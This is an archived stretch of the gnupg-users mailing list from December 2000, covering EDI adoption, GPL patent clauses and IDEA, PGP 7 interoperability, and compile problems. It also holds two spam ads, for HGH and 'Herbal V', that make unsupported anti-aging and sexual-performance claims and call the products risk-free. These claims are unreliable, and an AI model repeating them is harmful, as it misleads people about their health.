Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From timm@as400ftp.com Thu Dec 28 16:57:38 2000 From: timm@as400ftp.com (Tim McCarthy) Date: Thu, 28 Dec 2000 11:57:38 -0500 Subject: Sphinx Message-ID: > They will have to use a kind standard too. I doubt than anyone is > using EDI which was proposed for document exchange a long time ago. > Everbody is exchanging documents by mailing WORD files. [Tim McCarthy] Not true at all. EDI is used by over 95% of large corporations in the US and a significant portion of small to medium size companies (most large European companies have EDI initiatives too). XML is making a little headway but EDI is still by far the most prevalent form of document exchange both in terms of number of transactions exchanged and sheer byte size. > Okay, that > is far away from being a standard but nevertheless a world wide > deployed data format. So there is still hope. > > Werner > > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From timm@as400ftp.com Thu Dec 28 16:58:05 2000 From: timm@as400ftp.com (Tim McCarthy) Date: Thu, 28 Dec 2000 11:58:05 -0500 Subject: Sphinx Message-ID: You'd be too small, but you can bet that nearly everything you buy in a store from a large retailer was ordered, delivered and invoiced via EDI. If the manufacturer wants the sale data from the cash register they can get it - via EDI. The new moves in EDI (certainly in the US) are now toward using the internet as the delivery mechanism for such transactions - previously private networks were used - using S/MIME for the security services. PGP/MIME is permitted by the EDI-INT spec but S/MIME appears to be the preferred option. TrailBlazer Systems, Inc. http://www.as400ftp.com AS/400 Communications & E-Commerce Solutions Chaos, panic and disorder...my work here is done. > -----Original Message----- > From: Werner Koch [SMTP:wk@gnupg.org] > Sent: Thursday, December 28, 2000 11:21 AM > To: Tim McCarthy > Subject: Re: Sphinx > > On Thu, 28 Dec 2000, Tim McCarthy wrote: > > > [Tim McCarthy] Not true at all. EDI is used by over 95% of > > large corporations in the US and a significant portion of small to > > Maybe, but I have never seen this as a customer/client or whatever > of a company. There seems to be only PDF and Word. > > Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From steven_scott@solutionconsultantsinc.com Thu Dec 28 19:15:22 2000 From: steven_scott@solutionconsultantsinc.com (Steven Scott) Date: Thu, 28 Dec 2000 14:15:22 -0500 Subject: GnuPG 1.0.4-1 + IDEA for Windows References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <977602001.3a4505d13e702@nullify.org> <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <977642284.3a45a32c931d3@nullify.org> <87ae9l7i68.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <20001224171621.C4668@alcove.wittsend.com> <20001225013036.A2009@alcove.wittsend.com> Message-ID: <003a01c07102$86e80600$5000a8c0@anewstore.com> Actually, section 8 applies to the copyright holder (FSF) which allows them to restrict the distribution of the software to the countries that have the patent problem. This does not conflict the patent statements of section 7, but would allow the copyright holder to restrict the distribution of the software containing the patented code, to only those countries that do not have the patent problem. This would allow the FSF to include the IDEA code in a distribution, but add a restriction that in can not be used in the US, or other countries that have Patents on software. Steven Scott Solution Consultants Inc. Email: mailto:steven_scott@solutionconsultantsinc.com ----- Original Message ----- From: "Michael H. Warfield" To: "ESP" ; "Keith Ray" ; Cc: "Michael H. Warfield" Sent: Monday, December 25, 2000 1:30 AM Subject: Re: GnuPG 1.0.4-1 + IDEA for Windows > Followup, after I reread the GPL yet AGAIN... > > On Sun, Dec 24, 2000 at 05:16:21PM -0500, Michael H. Warfield wrote: > > > The patents clause of the GPL is invalid simply because it doesn't > > address the issue of jurisdiction. With that clause in place, we either > > have software which is GPL in some countries and not in either, or we > > say that any patent anywhere applies which places the GPL hostage to > > any past, present or future patent scheme in any country in the world, > > or we say that one countrie's jurisdiction applies to the entire world. > > (The US applying to EC, yeah right... They'll be singing Jingle Bells > > in hades.) > > Ok... I blew it. The GPL has specific provisions for distribution > in the case of patents enforced in certain geographical areas. > > ] 8. If the distribution and/or use of the Program is restricted in > ] certain countries either by patents or by copyrighted interfaces, the > ] original copyright holder who places the Program under this License > ] may add an explicit geographical distribution limitation excluding > ] those countries, so that distribution is permitted only in or among > ] countries not thus excluded. In such case, this License incorporates > ] the limitation as if written in the body of this License. > > Ok... That sounds like a way out of the box, doesn't it. Add > a message stating the geographical distribution. Of course, the section > says "may add". That's interesting in that we now have a dilema. If > the GPL prohibits any and all patented technology, then this passage > is simply gibberish. You could never HAVE any such qualifying software, > if the very thing itself was prohibited. If it is NOT truely prohibited, > as section 8 implies, then the original copyright holder is only obligated > under a "may" and not even a "should" much less a "must". To use IETF > delineations of nominclature, "must" implies something that is required, > while "should" is something recommended and "may" is something permitted. > So section 8 of the GPL as it is included with GnuPG states that if a > program (implied to be under the GPL or why would we be discussing this) > is restricted by patents (implying that GPL software might be restricted > by patents) then the author is permitted (may) to add a restriction on > distribution. > > It would appear that sections 7 and 8 are in direct conflict > with each other. How can you even have section 8 if an allegation > of patent infringement means that you must refrain entirely from > distribution. Looks like we have an RMS paradox here. > > It's pretty clear that if patents were excluded from GPL software, > section 8 would be superfluous. If section 8 is NOT superfluous, then > patents are permitted in GPL software (even patents without universally > free access as described elsewhere) and if the authors of the GPL had > meant to REQUIRE an author to restrict distribution, they would have > used other verbage in section 8. Section 8 exists and is worded "may". > > BTW... We now have a problem. Since it has been insisted that > this can not be distributed because it contains the Idea algorithm and > that algorithm is patented, there is something else in GnuPG which is > patented. Hyperlinks. Yes folks, in case you have been living under > a rock recently, British Telecom not only claims to hold a patent on > Hyperlinking technology in general but they are also suing Prodigy > for infringing on that patent in the US. With any decent luck (and a > clueful judge) this will be thrown out for the rediculous non-sense that > it is. ITMT, however, GnuPG contains hyperlinks in its README files and > in the various html files and even in a few .c sources. Till it is thrown > out in court, we could be held to be infringing. Even the extreme > rediculous examples that people dream up can't hold a candle to reality. :-( > > Under section 7, we now have an allegation of infringement of > the BT Hyperlink patent. Now we have a problem, even if all of us > AGREE that the patent is rediculous, since the GPL says explicitly, "or > allegation of patent infringement." You don't even have to be proven > to be infringing and it says nothing about the legitimacy or sanity > of the patent itself. It just says "or allegation". Under RMS writing, > we are guilty until proven innocent. > > That's exactly what RMS is point out in this section of the GPL: > > ] Finally, any free program is threatened constantly by software > ] patents. We wish to avoid the danger that redistributors of a free > ] program will individually obtain patent licenses, in effect making the > ] program proprietary. To prevent this, we have made it clear that any > ] patent must be licensed for everyone's free use or not licensed at all. > > Well... According to BT, hyperlinking is not free to use without > royalties (and they are hitting up several other ISP's for royalities > as well). They constitute some small subset of "everyone". > > > > you want in it, and distribute it? > > > He has meet the letter of the GPL as applied in the EC. If it > > doesn't apply in the US, fine. Distribute it from one of the .nl crypto > > sites. Replay changed names and is now what, zedz.net? Upload it to > > zedz.net and be done with it! What are you going to do then? It meets > > the full letter of the GPL. Idea is NOT patented in that jurisdiction. > > Declare the distribution per the GPL and distribute it with that > statement. Question becomes, what consitutes an explicit geographical > distribution limitation? Obviously, a list of countries would qualify. > Would a statement that "can be distributed with no limitations in any > country where Idea is not patented" constitute an explicit geographical > limitation? In most cases, it would. It states a testable definitive > condition underwhich an explicit determination can be made. Works for me. > > > > KR> Why can't we provide TWO versions and let the users decide > > > KR> which best meets there needs? > > > > Well, at the very least, you're requiring some expensive lawyer time > > > to get you to do something that you know you're going to have to do > > > eventually. What good does that do? > > Nope... Take the easy way out of the box. State the distribution > and let the users sort it out, just like they did with the original pgp > and the US export restrictions. Free for distribution in Europe and other > countries not encumbered by software patents. Right there in the GPL. > > My 0.02 euro. > > [...] > > Mike > -- > Michael H. Warfield | (770) 985-6132 | mhw@WittsEnd.com > (The Mad Wizard) | (678) 463-0932 | http://www.wittsend.com/mhw/ > NIC whois: MHW9 | An optimist believes we live in the best of all > PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From steven_scott@solutionconsultantsinc.com Thu Dec 28 19:20:26 2000 From: steven_scott@solutionconsultantsinc.com (Steven Scott) Date: Thu, 28 Dec 2000 14:20:26 -0500 Subject: Sphinx References: <20001227124923.25799.qmail@oak.oeko.net> <20001227104940.B591@aspirin.smsu.edu> <20001228105308.A1226@cray.muc.atsec.de> <20001228144212.H24249@gnupg.de> Message-ID: <005a01c07103$3bdaa7c0$5000a8c0@anewstore.com> EDI is large around North America with most large companies using the format to exchange data. The data exchanged tends to be (in my experience) transaction record based data, such as an items information, with multiple records for multiple items. Where I worked with EDI, we received test results for a piece from an outside lab via EDI. Each transmission would contain hundreds of pieces, with dozens of transaction lines per piece. EDI tended to be sent over costly permanent connections (direct lines, etc) and is currently moving to the internet for a number of companies. I can see XML replacing EDI at some point, but I think EDI will still be around for some time as it is easier (and less costly) to route the current EDI transmissions via the internet, then it is to rebuild everything in XML. Steven Scott Solution Consultants Inc. Email: mailto:steven_scott@solutionconsultantsinc.com ----- Original Message ----- From: "Werner Koch" To: Cc: "Andreas Siegert" Sent: Thursday, December 28, 2000 8:42 AM Subject: Re: Sphinx > On Thu, 28 Dec 2000, Andreas Siegert wrote: > > > centered. If you your key contacts for e-mail are in the German government, > > there is probably no way around it, but for the rest, I really don't think > > They will have to use a kind standard too. I doubt than anyone is > using EDI which was proposed for document exchange a long time ago. > Everbody is exchanging documents by mailing WORD files. Okay, that > is far away from being a standard but nevertheless a world wide > deployed data format. So there is still hope. > > Werner > > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From kai.raven@gmx.de Fri Dec 29 10:15:05 2000 From: kai.raven@gmx.de (Kai Raven) Date: Fri, 29 Dec 2000 11:15:05 +0100 Subject: RSA/DEA signatures Message-ID: <200012291115050436.001B039B@mail.gmx.net> Hi, is it possible to fix the problem with RSA/IDEA keys when signing and encrypting to a user in the next GPG release? PGP 6.5.8 interprets these signatures as detached signatures and PGP 2.6.3 gives the message "Bad or missing CTB_CKE byte". I think it's an old problem? Ciao Kai -- PGP/GPG [RSA]: 2048-bit Key-ID: 0x7B251671 Homepage: http://beam.to/raven GPG&GnuPGshellinfos: http://home.nexgo.de/kraven/pgp/pgp02aa.html -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From kai.raven@gmx.de Fri Dec 29 10:23:09 2000 From: kai.raven@gmx.de (Kai Raven) Date: Fri, 29 Dec 2000 11:23:09 +0100 Subject: GPG revocations & PGP In-Reply-To: <20001228141925.F24249@gnupg.de> References: <200012271115590773.00447890@mail.gmx.net> <87puienkad.fsf@deneb.enyo.de> <20001228141925.F24249@gnupg.de> Message-ID: <200012291123090993.00226868@mail.gmx.net> Hello Werner, On 28.12.2000 [Time:14:19] you wrote: >IMHO it is easier to take the revocation signature and import it >using GnuPG and then send the entire key to the keyserver. Now i see and the revocation was accepted by pgp5.ai.mit.edu. It would be better to add this procedure in the documentation. Ciao & Thanx Kai -- PGP/GPG [RSA]: 2048-bit Key-ID: 0x7B251671 Homepage: http://beam.to/raven GPG&GnuPGshellinfos: http://home.nexgo.de/kraven/pgp/pgp02aa.html -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fw@deneb.enyo.de Fri Dec 29 15:23:23 2000 From: fw@deneb.enyo.de (Florian Weimer) Date: 29 Dec 2000 16:23:23 +0100 Subject: GPG revocations & PGP In-Reply-To: <200012291123090993.00226868@mail.gmx.net> References: <200012271115590773.00447890@mail.gmx.net> <87puienkad.fsf@deneb.enyo.de> <20001228141925.F24249@gnupg.de> <200012291123090993.00226868@mail.gmx.net> Message-ID: <87u27njlp0.fsf@deneb.enyo.de> "Kai Raven" writes: > >IMHO it is easier to take the revocation signature and import it > >using GnuPG and then send the entire key to the keyserver. > > Now i see and the revocation was accepted by pgp5.ai.mit.edu. > It would be better to add this procedure in the documentation. Are copyright assignments required for documentation snippets? ;-) -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Sun Dec 31 01:16:46 2000 From: rich@cnylug.org (Rich) Date: Sat, 30 Dec 2000 20:16:46 -0500 Subject: Chaos Congress Message-ID: <3A4E88FE244.23E7RICH@mail.lcsweb.net> Werner, When are you going to upload a transcript of your talks from the Chaos Congress? Just curious. :-) Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From afx@atsec.com Fri Dec 1 16:31:25 2000 From: afx@atsec.com (Andreas Siegert) Date: Fri, 1 Dec 2000 17:31:25 +0100 Subject: PGP 7 and encrypted session key is bad Message-ID: <20001201173125.A5986@cray.muc.atsec.de> Hi, I am using gpg 1.0.3 and 1.0.4 (Linux). I am trying to interoperate with PGP 7.0 (NT). When encrypting messages to the PGP system, no matter if it is a gpg or pgp generated key, I always get the error "encrypted session key is bad". If I send signed messages (with a GPG key) then I get a "found detached sig, no callback" error from PGP. Browsing the archive I found references to using CAST, and I ended up setting to following options: escape-from-lines lock-once rfc1991 cipher-algo CAST5 compress-algo 1 no-comment Still, no go. Am I missing something? Didn't see anything in the FAQ pointing to PGP 7 and I hope I have included everything I need that I could see from references to the older versions. Colleagues who use gpg 1.0.1 as shipped with redhat tell me that they don't have this problem. For obvious reasons, I'd like to us a more current release :-) thanks for any hints afx -- atsec information security GmbH Phone: +49-89-44249830 Steinstrasse 68 Fax: +49-89-44249831 D-81667 Muenchen, Germany WWW: www.atsec.com May the Source be with you! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Fri Dec 1 17:22:46 2000 From: rich@cnylug.org (Rich) Date: Fri, 01 Dec 2000 12:22:46 -0500 Subject: New WinPT mailing lists. Message-ID: <3A27DE6610E.6AF7RICH@mail.dreamscape.com> Ok, so we never have to talk about WinPT in here again Timo set up 2 mailing lists for WinPT discussion. They are: winpt-users winpt-dev And they both reside at majordomo@lcsweb.net if any of you want to subscribe (I'm sure you all know how!) :-) Thank, Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Fri Dec 1 19:26:55 2000 From: rich@cnylug.org (Rich) Date: Fri, 01 Dec 2000 14:26:55 -0500 Subject: Yarrow Message-ID: <3A27FB7F104.8DF3RICH@mail.dreamscape.com> Does anyone have any familiarity with Counterpane's Yarrow PNRG, or has anyone used or implemented it in their code? Just curious. Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From asishlaw@aaxisgroup.com Fri Dec 1 19:50:02 2000 From: asishlaw@aaxisgroup.com (Asish Law) Date: Fri, 01 Dec 2000 11:50:02 -0800 Subject: [Fwd: Problem compiling gnupg] References: <3A23FE02.ECA5D1E0@aaxisgroup.com> <20001129090552.G22524@gnupg.de> Message-ID: <3A2800EA.F3F50D77@aaxisgroup.com> This is a multi-part message in MIME format. --------------CC186E595B9EB5436A54792B Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Hi, I am trying to install ming32/cpd using Cygwin, and getting into some problems. I hope somebody can help me out. Please cc to asishlaw@aaxisgroup.com, as I am not subscribed to this list. I tried to follow the instructions in gnupg-1.0.4/doc/Readme.w32 to download and install mingw32/cpd, and getting into a few problems. 1. After I have untar'ed all the 4 packages (mingw32-cpd-0.2.4, windows32api-0.1.2, gcc-2.95.2, binutils-2.9.1), I try to run ./Configure in the mingw32-cpd-0.2.4 folder. It gives me syntax error at line 72 of the Configure file. I removed the keyword "function" from in-front of the function names, and then at least it continues with the configuration - I don't know if this is right. 2. Once I get configure started, it tries to patch gcc, but fails to patch around the end of the gcc-2.95.2.diff patch file, i.e., around the following statements: +#ifndef __MINGW32__ #include #include #include @@ -53,3 +54,4 @@ 3. If I ignore the above error, and finish configuring, then I run "make install", it proceeds until some point, but then is unable to find cpp.texi in the gcc-2.95.2/gcc folder. I don't understand why it is unable to find this file, because I can see it in the above folder. I have been trying to compile gnupg sources for more than a week now, and getting into one problem after another. Any help will be greatly appreciated. Thanks. Werner Koch wrote: > On Tue, 28 Nov 2000, Asish Law wrote: > > > I am trying to compile gnupg on Windows NT 4.0 using Cygwin. Follwing > > > While making, it errors when trying to compile rndunix.c in the cipher > > You have to use the rndw32.c thing. You may have to modify the source > to accomplish this. My suggestion is to use the mingw32/cpd system; > see doc/README.W32 > > Werner --------------CC186E595B9EB5436A54792B Content-Type: text/x-vcard; charset=us-ascii; name="asishlaw.vcf" Content-Transfer-Encoding: 7bit Content-Description: Card for Asish Law Content-Disposition: attachment; filename="asishlaw.vcf" begin:vcard n:Law;Asish tel;cell:323-974-4581 tel;fax:323-651-3224 tel;home:323-934-5187 tel;work:323-653-1500 x-mozilla-html:FALSE url:http://www.aaxisgroup.com org:Aaxis Group Corp. adr:;;6399 Wilshire Blvd., suite 914;Los Angeles;CA;90048;USA version:2.1 email;internet:asishlaw@aaxisgroup.com title:Sr. Technical Consultant fn:Asish Law end:vcard --------------CC186E595B9EB5436A54792B-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stefan@epy.co.at Fri Dec 1 20:06:25 2000 From: stefan@epy.co.at (Stefan H. Holek) Date: Fri, 1 Dec 2000 21:06:25 +0100 (CET) Subject: PGP 7 and encrypted session key is bad In-Reply-To: <20001201173125.A5986@cray.muc.atsec.de> Message-ID: On Fri, 1 Dec 2000, Andreas Siegert wrote: > I am using gpg 1.0.3 and 1.0.4 (Linux). > I am trying to interoperate with PGP 7.0 (NT). > > When encrypting messages to the PGP system, no matter if it is a gpg or pgp > generated key, I always get the error "encrypted session key is bad". If I send > signed messages (with a GPG key) then I get a "found detached sig, no > callback" error from PGP. > escape-from-lines > lock-once > rfc1991 I don't know what rfc1991 actually does and I don't use it. The manpage says: "Try to be more RFC1991 (PGP 2.x) compliant." ??? > cipher-algo CAST5 > compress-algo 1 > no-comment I also have digest-algo sha1 # gpg will otherwise use RIPE-MD-160 and, though you don't appear to have key problems s2k-cipher-algo cast5 # gpg default for this is BLOWFISH s2k-digest-algo sha1 # default RIPE-MD-160 There have also been some No Callback discussions on pgp-users; unresolved AFAIK. Make sure it is not actually a problem with the plugin or the mail client on the Windows side. Are you using PGP/MIME? Try without. HTH, Stefan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Younger@bdsm.at Fri Dec 1 21:58:51 2000 From: Younger@bdsm.at (Younger@bdsm.at) Date: Fri, 1 Dec 2000 22:58:51 +0100 Subject: REVERSE the AGING PROCESS 10-20 Years! Message-ID: <200012012158.eB1LwpZ10859@mail.hsp.de> HAVE YOU HEARD OF HUMAN GROWTH HORMONE (HGH)??? Released by your own pituitary gland, HGH starts declining in your 20s, even more in your 30s and 40s, eventually resulting in the shrinkage of major organs-plus all other symptoms related to old age. THIS CAN NOW BE REVERSED!!! IN THOUSANDS OF CLINICAL STUDIES, HGH HAS BEEN SHOWN TO ACCOMPLISH THE FOLLOWING: * Reduce Body Fat Without Dieting Build Lean Muscle WITHOUT EXERCISE! * Enhance Sexual Performance * Remove Wrinkles and Cellulite * Lower Blood Pressure and improve Cholesterol Profile * Improve Sleep, Vision and Memory * Restore Hair Color and Growth * Strengthen the Immune System * Increase Energy and Cardiac Output * Turn back your body's Biological Time Clock 10-20 years in 6 months of usage !!! You don't have to spend thousands of dollars on shots. You don't have to spend the $139.00 per bottle that HGH is selling for at some Clinics in the United States. For the next 30 Days, you can obtain a complete one-month supply of our HGH releaser for our special "New Customers" price of just $69.95 plus $6.00 shipping and handling. To ensure a constant supply and to SAVE EVEN MORE, you can order with confidence 3 bottles of HGH and GET 1 FREE - that's just $209.85 for 4 bottles, plus $6.00 shipping and handling. You SAVE $69.95! ORDER TODAY! Payment Methods You may FAX or Postal Mail Checks, MasterCard, Visa, & American Express payments. Money Orders are accepted only by Postal Mail. Step 1: Place a check by your desired quanity. ______ 1 Bottle of HGH $69.95 ______ 2 Bottles of HGH $131.90 ($65.95 a bottle) ______ 4 Bottles of HGH (Buy 3 get 1 FREE. SAVE $69.95) $209.85 Please add $6 shipping and handling for any size order. [ Total cost including shipping & handling, 1 bottle=$75.95, 2 bottles=$137.90, 4 bottles=$215.85 ] International shipping, please add $35 for any size order [ Total cost including shipping & handling, 1 bottle=$104.95, 2 bottles=$166.90, 4 bottles=$244.85 ] Foreign checks are not accepted. Credit cards & international money orders only. Step 2: Place a check by your desired payment method and complete fields if necessary. _____Check or CHECK-BY-FAX [details below] _____Money Order _____American Express Account Number__________________ Exp____/____ _____Visa Account Number__________________ Exp____/____ _____MasterCard Account Number__________________ Exp____/____ Please make your check or money order payable to "Lion Sciences National". Step 3: Please complete and print the following fields clearly. Name ___________________________________________________ Address _________________________________________________ City ____________________________________________________ State ___________________________________________________ Zip _____________________________________________________ E-mail __________________________________________________ Signature _________________________________________________ [ required for check and credit card orders] Toll Free FAX Order Line: 1-800-940-6590 If faxing in your order, please state whether you require a fax, email, or no confirmation at all. Allow up to one day for confirmation, if requested. FAX orders are processed immediately. Or, print & mail to: Lion Sciences National 273 S. State Rd. 7 #193 Margate, FL 33068-5727 ______________________________________________________ *CHECK BY FAX ORDERS: Complete the check as normal. Tape the check in the area below. Below the check, clearly write the check number, all numbers at the bottom of the check, & your name. Tape the check below and fax the check to the toll free FAX number above. Void the check. Our merchant will electronically debit your account for the amount of the check; your reference number for this transaction will be your check number. Nothing could be safer & easier ! TAPE CHECK BELOW _____________________________________________________________ This is a one time mailing: Removal is automatic and no further contact is necessary. Please Note: HGH is not intended to diagnose, treat, cure or prevent any disease. The FDA has not evaluated these statements. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Ingo@Freund-HH.net Sat Dec 2 17:22:50 2000 From: Ingo@Freund-HH.net (Ingo Freund) Date: Sat, 2 Dec 2000 18:22:50 +0100 Subject: GnuPG on DEC/Compaq True64 4.0E Message-ID: Hi, could you pls CC me? my problem: has anybody heard about how to compile GnuPG on an Alpha machine with True64 4.0E on it?? I would be thankful for your advices... Ingo //------------------------------------------------------------------ Ingo Freund E-Mail Ingo.Freund@e-dict.net D-21079 Hamburg/Germany Ingo@Freund-HH.net //------------------------------------------------------------------ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From HV@derfriseur.de Sat Dec 2 19:35:18 2000 From: HV@derfriseur.de (HV@derfriseur.de) Date: Sat, 2 Dec 2000 20:35:18 +0100 Subject: At Last, Herbal V, the All Natural Alternative is Available! Message-ID: <200012021935.eB2JZHH23703@mail.hsp.de> Herbal V: An Incredible All-Natural Healthy Alternative To V----a Herbal V is the All Natural Approach to Male Virility, Vitality and Pleasure. Available N o w ! Welcome to the New Sexual Revolution. It's the all natural male potency and pleasure pill that men everywhere are buzzing about. Herbal V is safe, natural and specifically formulated to help support male sexual function and pleasure. You just take two easy-to-swallow tablets one hour before sex. And there's more great news - you can get Herbal V for less than $1 a pill. Amazing word of mouth praise on Herbal V has been spreading like wildfire-already over 1,500,000 men have chosen Herbal V. Since it is 100% natural you will never have to worry about safety. Try doctor-recommended Herbal V today and have the greatest night of your life! Herbal V... Bringing Back the Magic! 1,585,000 men can't be wrong. To date over 1 million men have tried the super supplement Herbal V. Here is why: No Doctor Visit Required Available Over the Counter Not a Drug 100% Natural Safe, No Worries Highest Quality Pharmaceutical-Grade Pure Nutriceuticals Guaranteed Potency & Purity Be a Real Man Again! Questions and Answers What is Herbal V? Herbal V is a proprietary blend that was specifically developed as a safe alternative for men who prefer an all-natural approach to address impotence and boost sexual performance. This amazing formula first became popular with Hollywood insiders and the wealthy elite. They were maximizing their sex lives, long before it was available to the general public. How does Herbal V work? Developed by a team whose goal was to create the perfect all-natural aphrodisiac. Herbal V is the result of that remarkable effort. The Herbal V formula contains a precise blend of cutting edge pro-sexual nutrients from around the world that provide nutritional support, making it possible for a man to have a pleasurable sexual experience. What can Herbal V do for me? Herbal V helps support male sexual function and pleasure in a safe and natural manner. Simply put, it can make your sex life incredible. Is Herbal V Safe? One of the great things about Herbal V is that it is not a drug. It is an incredible herbal dietary supplement that provides nutritional support for male sexual function and pleasure. One of the most comforting features of Herbal V is that you never have to worry about safety. Herbal V: Safe - Natural - Exciting Many have speculated that because Herbal V is so popular with men, it must contain prescription drugs or chemical components. Herbal V does not contain any elements or traces of any prescription drug. Herbal V is made using the world's most technologically advanced state-of-the-art cold processing equipment to ensure maximum purity. Herbal V has been independently analyzed by the nation's premier testing facility to ensure purity, quality and to end the rumors that, because it is so popular, it must somehow be chemical. It is not. Herbal V is natural - just as it says on the label. Herbal V is simply fantastic! Herbal V: Ingredients Yohimbe, saw palmetto, avena sativa, androstenedione, guarana, taurine, siberian ginseng, tribulus terrestris. Tribulus Terrestis is certified to enhanced testosterone levels by increasing Luteinzing hormone (LH) levels. Androstenedione which is a precursor to testosterone unlocks bound testosterone and makes it biologically active again quickly. This means a dramatic surge in desire. Avena Sativa Stimulates the neurotransmitter pleasure centers to maximum capacity. This greatly intensifies pleasure. Just listen to what Herbal V has done for the sex lives of people like you! “On a scale of 1 to 10, it's a 15. Electrifying. It's like a wonder pill!” — Justin Q B., New Haven, Texas “I haven't had sexual relations in 11 years. Then with Herbal V it was... wow! It works again!” — Sid R., Lakeland, Florida “I had sex four times in one night. It made me feel like a 19-year-old again.” — Chip S, Beech Mountain, North Carolina “Herbal V has turned my husband into a Sexual Superman! I like the fact that it's all natural and has no side effects. It's bringing back the good old days.” — Jennifer B, Beverly Hills, California The above testimonials are from product literature, and we have not independently verified them. However, the following testimonial is from a "senior" gentleman who has purchased his second bottle of Herbal V. When we heard his words with our own ears, we asked his permission to print them here. “Man! I'm wild as I can be! I feel like I'm 25 years old again! I'm not believing this!” — Mr. Murphy, age 64, Lampart, IL. Risk Free: Double Your Money Back Guarantee If Herbal V does not give the desired results as stated above, simply return the unused portion for a double-your money back refund. No questions asked ! Order Now: Safe, Fast, Secure, Private Herbal V with its DOUBLE YOUR MONEY BACK GUARANTEE is available only through this special promotional offer. Herbal V arrives in plain packaging for your privacy. Any and all information is kept strictly confidential. Payment Methods You may FAX or Postal Mail Checks, MasterCard, Visa, & American Express.payments. Money Orders are accepted only by Postal Mail. Each bottle of Herbal V contains 30 tablets, approximately a 1 month supply. Step 1: Place a check by your desired quanity. ______ 1 Bottle of Herbal V $28 ______ 2 Bottles of Herbal V $48 ______ 3 Bottles of Herbal V $59 Please add $6 shipping and handling for any size order. [ Total cost including shipping & handling, 1 bottle=$34, 2 bottles=$54, 3 bottles=$65 ] International Orders Please add $18 shipping and handling for any size order. [ Total cost including shipping & handling, 1 bottle=$46, 2 bottles=$66, 3 bottles=$77 ] We cannot accept foreign checks. International money orders or credit cards only. Step 2: Place a check by your desired payment method and complete fields if necessary. _____Check or CHECK-BY-FAX [details below] _____Money Order _____American Express Account Number__________________ Exp____/____ _____Visa Account Number__________________ Exp____/____ _____MasterCard Account Number__________________ Exp____/____ Step 3: Please complete and print the following fields clearly. Name ___________________________________________________ Address _________________________________________________ City ____________________________________________________ State ___________________________________________________ Zip _____________________________________________________ E-mail __________________________________________________ Signature _________________________________________________ [ required for check and credit card orders] Toll Free FAX Order Line: 1-800-940-6590 If faxing in your order, please state whether you require a fax, email, or no confirmation at all. Allow up to one day for confirmation, if requested. FAX orders are processed immediately. Or, print & mail to: LSN 273 S. State Rd. 7, #193 Margate, FL 33068-5727 ______________________________________________________ *CHECK BY FAX ORDERS: Complete the check as normal. Tape the check in the area below. Below the check, clearly write the check number, all numbers at the bottom of the check, & your name. Tape the check below and fax the check to the toll free FAX number above. Void the check. Our merchant will electronically debit your account for the amount of the check; your reference number for this transaction will be your check number. Nothing could be safer & easier ! TAPE CHECK BELOW _____________________________________________________________ This is a one time mailing: Removal is automatic and no further contact is necessary. Please Note: Herbal V is not intended to diagnose, treat, cure or prevent any disease. As individuals differ, so will results. Herbal V helps provide herbal and nutritional support for male sexual performance. The FDA has not evaluated these statements. For details about our double your money back guarantee, please write to the above address, attention consumer affairs department; enclose a self addressed stamped envelope for this and any requested contact information. Thank You. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From turfdog@planetturf.ca Sun Dec 3 20:51:32 2000 From: turfdog@planetturf.ca (Derek Vokey) Date: Sun, 3 Dec 2000 12:51:32 -0800 Subject: key has been created 10356 seconds in future Message-ID: <000f01c05d6a$d29b8d20$01a800c0@derekvok> I am getting this error when attempting import a new public key. I have found this error in the archives and I can't seem to find the answer. Any help would be appreciated. gpg: armor: BEGIN PGP PUBLIC KEY BLOCK gpg: armor header: Version: GnuPG v1.0.4-1 (MingW32) gpg: armor header: Comment: For info see http://www.gnupg.org gpg: loaded digest 2 